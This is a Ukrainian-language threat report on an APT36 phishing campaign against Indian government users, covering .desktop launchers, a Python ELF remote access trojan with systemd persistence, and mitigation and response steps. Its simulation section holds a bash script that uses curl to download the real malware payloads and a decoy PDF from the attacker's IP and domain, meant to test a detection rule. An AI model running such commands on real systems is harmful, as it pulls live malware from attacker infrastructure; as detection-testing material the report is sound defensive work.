APT36 Впроваджує шкідливе програмне забезпечення Python ELF проти індійських урядових структур
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
APT36 (Прозора Плем’я) провела фішингову кампанію, що розповсюджувала шкідливі файли ярликів Linux .desktop серед користувачів уряду Індії. Ці лаунчери завантажують та запускають Python-основаного ELF RAT під назвою swcbc з сервера, контрольованого атакуючими. Шкідливе ПЗ зберігає стійкість через сервіс systemd на рівні користувача та спілкується зі своїм C2 через HTTP для ексфільтрації даних і виконання команд. Кампанія підкреслює зростаючу здатність групи ефективно оперувати в Linux-середовищах.
Розслідування
Розслідування слідувало ланцюжку від початкового вкладення .zip до лаунчера .desktop, файлу підставки PDF та двох навантажень (ELF-бінарний файл swcbc і скрипт swcbc.sh), завантажених з IP-адреси, контрольованої актором. Аналіз показав, що ELF-бінарник є упакованим за допомогою PyInstaller Python RAT з можливостями профілювання системи, завантаження/вивантаження файлів, зняття скріншотів та самовидалення. Стійкість реалізується шляхом реєстрації сервісу systemd в каталозі конфігурації користувача.
Пом’якшення
Рекомендовані заходи захисту включають блокування виконання .desktop, .sh та ELF файлів, що отримані електронною поштою, та забезпечення виконання підозрілих вкладень в пісочниці. Вимкніть автоматичне виконання з шляхів, доступних для запису, таких як /tmp, та застосовуйте опції монтування noexec, де це можливо. Моніторьте DNS та HTTP трафік для з’єднань з ідентифікованим шкідливим доменом та IP. Забезпечуйте суворий контроль застосувань на такі інструменти, як curl і LibreOffice.
Відповідь
Коли виявляється активність, ізолюйте уражений Linux-хост, зберіть шкідливі артефакти та системний сервіс systemd, і видаліть прихований каталог ~/.swcbc. Використовуйте судово-медичні інструменти для вилучення унікального ідентифікатора хоста та припинення будь-яких поточних сеансів C2. Оновіть вміст виявлення з отриманими IOC та проактивно шукайте подібні шаблони в ширшому середовищі.
Потік атаки
Виявлення
Виявлення завантаження шкідливих URL APT36 [Proxy]
Переглянути
Виконання шкідливого .desktop та Shell Script APT36 [Створення процесу Linux]
Переглянути
IOC (SourceIP) для виявлення: APT36 Python-обґрунтованого ELF зловмисного ПЗ, націленого на уряд Індії
Переглянути
IOC (DestinationIP) для виявлення: APT36 Python-обґрунтованого ELF зловмисного ПЗ, націленого на уряд Індії
Переглянути
IOC (HashSha256) для виявлення: APT36 Python-обґрунтованого ELF зловмисного ПЗ, націленого на уряд Індії
Переглянути
Виконання симуляції
Передумова: Перевірка телеметрії та базових параметрів повинна бути пройдена.
Мотив: Цей розділ детально описує точне виконання техніки супротивника (TTP), розробленої для викликання правила виявлення. Команди та наратив МУСЯТЬ безпосередньо відображати ідентифіковані TTPs та націлюватися на генерацію точної телеметрії, очікуваної логікою виявлення. Абстрактні або нерелевантні приклади призведуть до неправильної діагностики.
-
Розповідь атаки та команди:
Оператор APT‑36 розміщує три навантаження на скомпрометованій інфраструктурі та розсилає їх URL-адреси через фішингове електронне повідомлення. Жертва, використовуючи веб-браузер, налаштований на маршрутизування трафіку через корпоративний проксі-сервер, натискає кожне посилання. Проксі-сервер записує кожен запит GET, що створює записи, які відповідають правилуurl|all. Навантаження включають:- Сирий ELF-бінарний файл (
swcbc) переданий через HTTP. - Скрипт оболонки (
swcbc.sh), що при виконанні встановлює ELF. - Файл підставки PDF (
Analysis_Proc_Report_Gem.pdf), призначений для того, щоб заохотити користувача відкрити файл, поки шкідливий ELF запускається у фоновому режимі.
- Сирий ELF-бінарний файл (
-
Скрипт регресійного тесту:
#!/usr/bin/env bash # Симуляція завантаження шкідливих URL-адрес APT‑36 – викликає правило Sigma. set -euo pipefail # Визначте шкідливі URL (точні рядки з правила Sigma) urls=( "http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc" "http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc.sh" "https://lionsdenim.xyz/in/Analysis_Proc_Report_Gem.pdf" ) # Завантажте кожне навантаження через корпоративний проксі. # Передбачається, що змінна середовища http_proxy/https_proxy вказує на проксі. for u in "${urls[@]}"; do echo "[*] Завантаження $u через проксі..." curl -s -O "$u" done echo "[+] Всі шкідливі файли завантажені. Перевірте журнали проксі на відповідність URL."Збережіть скрипт як
apt36_simulation.sh, зробіть його виконуваним (chmod +x apt36_simulation.sh), і запустіть його на захищеній робочій станції. -
Команди очищення:
#!/usr/bin/env bash # Видалення всіх файлів, створених під час симуляції rm -f swcbc swcbc.sh Analysis_Proc_Report_Gem.pdf echo "[+] Очищення завершено."